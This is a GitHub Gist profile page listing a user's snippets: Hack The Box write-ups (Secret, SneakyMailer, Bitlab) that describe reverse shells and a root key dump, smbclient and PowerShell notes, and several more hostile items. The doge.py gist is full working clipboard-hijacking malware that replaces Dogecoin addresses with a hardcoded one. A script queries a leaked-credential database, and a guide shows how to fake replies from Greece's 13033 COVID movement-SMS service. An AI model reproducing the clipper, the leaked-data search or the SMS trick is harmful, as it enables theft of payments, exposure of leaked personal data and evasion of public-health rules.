Skip to content

Instantly share code, notes, and snippets.

View 3rg1s's full-sized avatar
☝️

fuxsocy.py 3rg1s

☝️
21 followers · 38 following
View GitHub Profile
@3rg1s
3rg1s / secret.md
Last active December 10, 2022 21:48
secret.md

Summary

Secret was an easy machine. The source code of the api was provided to us. With this we could use git log and see the token_secret which we could use to access and admin feature which allowed use to provide a filename which we then used to gain a reverse shell.Root had a binary with setuid bit set, but also had coredumps enabled which we used to dump the memory state of a program while the content of the file we wanted to read was there, this is how we got the id_rsa of root and then ssh as root.

Enumeration

Nmap

nmap found three open ports: 22, 80 and 3000.

nmap

Webserver port 80

@3rg1s
3rg1s / pdf.md
Created May 12, 2021 13:20
Pdf commands

Commands I used to split pdf and arrange them.

Extact all pages 


from PyPDF2 import PdfFileWriter, PdfFileReader

inputpdf = PdfFileReader(open("marg.pdf", "rb"))
@3rg1s
3rg1s / smbclient.md
Last active April 17, 2021 13:38
Smbclient commands to connect to host

Smbclient

List Shares (NO password)

smbclient -L \\apt

Login to share (No password)

@3rg1s
3rg1s / Powershell.md
Last active March 16, 2021 10:46
Powershell Commands.

list filesystem disks

powershell -c get-psdrive -psprovider filesystem

show hidden folders

dir -Force

get hexdump from a file

@3rg1s
3rg1s / doge.py
Last active June 2, 2021 11:37
When dogecoin address detected on the clipboard replace it with another one.
import re,pyperclip
while(1):
s = pyperclip.paste()
addr = re.findall(r"^[DT][a-km-zA-HJ-NP-Z1-9]{25,34}$",s)
if addr:
pyperclip.copy("D5kYkMmkKKNNvvEsx31FvirNT6oEyeirAi")
@3rg1s
3rg1s / scylla.py
Created December 15, 2020 12:04
Search inside leaked databases.
import requests
import urllib3
import sys
urllib3.disable_warnings()
payload = {'q': str(sys.argv[1]), 'size': '100', 'start': '0'}
r = requests.get('https://scylla.sh/search', params=payload, verify=False)
print(r.text)
@3rg1s
3rg1s / 13033.md
Created December 15, 2020 12:03
Trick 13033 by sending sms to your own number and getting instant response.

As COVID rises you are asked to use a movement certificate form or by sending a sms to 13033 In GREECE.

The data policy located here as per 9 April 2020 states that our message is deleted once we get the response back. And the message information is deleted or anonymized and used for statistical purposes.

If you use signal you can edit the sender number name as 13033 which will show as 13033 thus making it nearly impossible for someone to notice that this is not a number you are sending the sms to.

import os, time
@3rg1s
3rg1s / sneakymailer.md
Created September 14, 2020 13:09

Hello fellow hackers,

From nmap scan I have 7 open ports.

# Nmap 7.80 scan initiated Wed Sep  9 05:06:25 2020 as: nmap -sC -sV -oN initial 10.10.10.197
Nmap scan report for 10.10.10.197
Host is up (0.078s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
@3rg1s
3rg1s / Tools.md
Created April 22, 2020 18:06
@3rg1s
3rg1s / Bitlab.md
Last active January 30, 2020 23:10

Bitlab

Port 80 and 22, are open. Visiting 80 we see a gitlab server, I find the credentials http://10.10.10.114/help/bookmarks.html at this url, and when I click Github Login, I see obfuscated javascript. I copy the code and paste it to javascript console, run it, and the get the variable content. And I get the login credentials.

Login Creds

I goto Profile project and upload and commit to repo a php file with reverse shell code inside of it. I then visit http://10.10.10.114/profile/shell.php. Now I get a reverse shell as www-data.

Intended to Root